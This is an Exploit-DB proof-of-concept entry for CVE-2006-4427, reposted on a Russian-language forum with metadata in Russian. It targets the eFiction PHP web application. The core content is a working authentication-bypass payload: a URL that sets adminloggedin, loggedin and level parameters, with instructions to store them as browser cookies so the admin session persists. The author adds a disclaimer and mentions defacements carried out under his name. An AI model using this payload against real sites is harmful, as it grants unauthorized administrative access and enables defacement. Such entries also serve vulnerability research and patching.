- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2255
- Проверка EDB
-
- Пройдено
- Автор
- VIPSTA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4427
- Дата публикации
- 2006-08-25
Код:
##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whomever is defacing websites under my name stop,
since you would gain more notorioty under your own name.
##########################################
http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1
Use firefox's extension "add n edit cookies" to add these to your cookies so they stick.
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)
# milw0rm.com [2006-08-25]- Источник
- www.exploit-db.com
